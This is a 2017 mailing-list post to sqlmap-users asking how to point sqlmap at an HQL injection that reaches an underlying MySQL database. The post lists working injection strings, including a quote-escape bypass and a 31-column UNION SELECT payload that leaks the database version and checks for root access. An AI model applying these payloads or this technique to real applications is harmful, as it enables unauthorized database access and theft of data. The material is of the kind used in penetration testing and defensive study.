[sqlmap-users] injecting into MySQL through HQL
From: Robin W. <ro...@di...> - 2017-02-24 22:12:45
I've just found an instance of Hibernate Query Language injection that lets me get at an underlying MySQL database if I inject in the right way. Some examples I've got are:

loginName=a - works and gives 200
loginName=' - fails with HQL error and 500
loginName=a' or 'a'='a - works and gives 200
loginName=a\'' - gets through HQL and then generates a MySQL error in a where clause. The injection gets converted to where NAME='a\'''

With some playing I've found that this is a valid injection, and they are running as root, as I get a 500 back when I supply root and a 200 when I give something else:

loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" from users where user()="root@localhost" -- '='1

The 500 is because some of the stuff from the union isn't being handled correctly by the page; the 200 is because the union doesn't return any data, so the first bit (basically a=a) is returning valid data and getting through the rest of the parsing.

So I think what I need to do is to tell SQLMap that it is a union injection with 31 fields and that the injection needs to go into here:

loginName=a' and 'a\''="a" <INJECT> -- '='1

Can I do this? I've got all this set up and running in Burp so I can test things out if anyone needs me to.

Robin